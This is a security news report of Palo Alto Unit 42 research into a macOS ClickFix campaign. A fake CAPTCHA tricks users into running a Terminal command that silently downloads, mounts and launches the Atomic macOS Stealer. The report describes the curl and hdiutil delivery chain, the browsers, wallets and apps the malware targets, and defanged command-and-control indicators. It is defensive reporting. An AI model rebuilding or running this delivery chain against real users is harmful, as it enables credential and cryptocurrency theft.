A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.
Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS’s native hdiutil utility, locates the application bundle it contains, and launches it automatically.
ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied “fix instructions.” The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware.
While ClickFix attacks involving DMGs are not new, previous campaigns typically relied on users manually opening downloaded DMG files to launch malicious applications or execute scripts from attacker-controlled servers.
The campaign spotted by Palo Alto combines both approaches by using a Terminal command to quietly download a DMG file and launch the malware it contains.
Source: Palo Alto Networks Unit42
After running the Terminal command, the attack downloads a malicious DMG from svs-verificationdate[.]beer using curl with the quiet “-fsSL” flags and saves it to the /tmp folder under a random filename.
The command then executes ‘hdiutil attach -nobrowse‘ to mount the downloaded disk image without displaying it in Finder or on the desktop.
The script then searches up to three directory levels deep for the first available .app or .pkg installer, and if one is found, launches it using the macOS open command.
Researchers observed the malware being delivered as a disk image named “s.01M0td.dmg,” which mounted a volume containing a self-signed application bundle named “NNApp.app.”
This payload is part of the Atomic macOS Stealer family, which is used to steal credentials, browser history, authentication tokens, and cryptocurrency wallets from infected devices.
Source: Palo Alto Networks Unit42
The stealer will display a fake System Preferences authentication prompt that asks the user to enter their password, allowing the malware to steal it.
According to the researchers, the malware targets eight Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals cookies, login databases, autofill information, stored payment cards, and browser profile data.
The stealer also targets Firefox-derived browsers, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser, stealing the same information.
Palo Alto says the malware searches for and steals cryptocurrency wallet data, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper.
The malware also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with the PDF, TXT, or RTF extensions.
All harvested data is then stored in a ZIP archive and uploaded to the attacker’s server, where the attacker can retrieve it.
Of particular interest, the researchers found that the malware will replace legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to perform crypto theft.
The campaign was observed using command-and-control servers at svs-verificationdate[.]beer and 196.251.107[.]171.
As a general rule, users should always be cautious when websites instruct them to open Terminal and execute commands. This is especially true when they claim to be part of CAPTCHA verifications, browser fixes, or other troubleshooting steps.
If you do not 100% understand what a command does, do not run it.
Security teams log 54% of successful attacks and alert on just 14%. The rest move through your environment unseen.
The Picus whitepaper shows how breach and attack simulation tests your SIEM and EDR rules so threats stop slipping by detection.
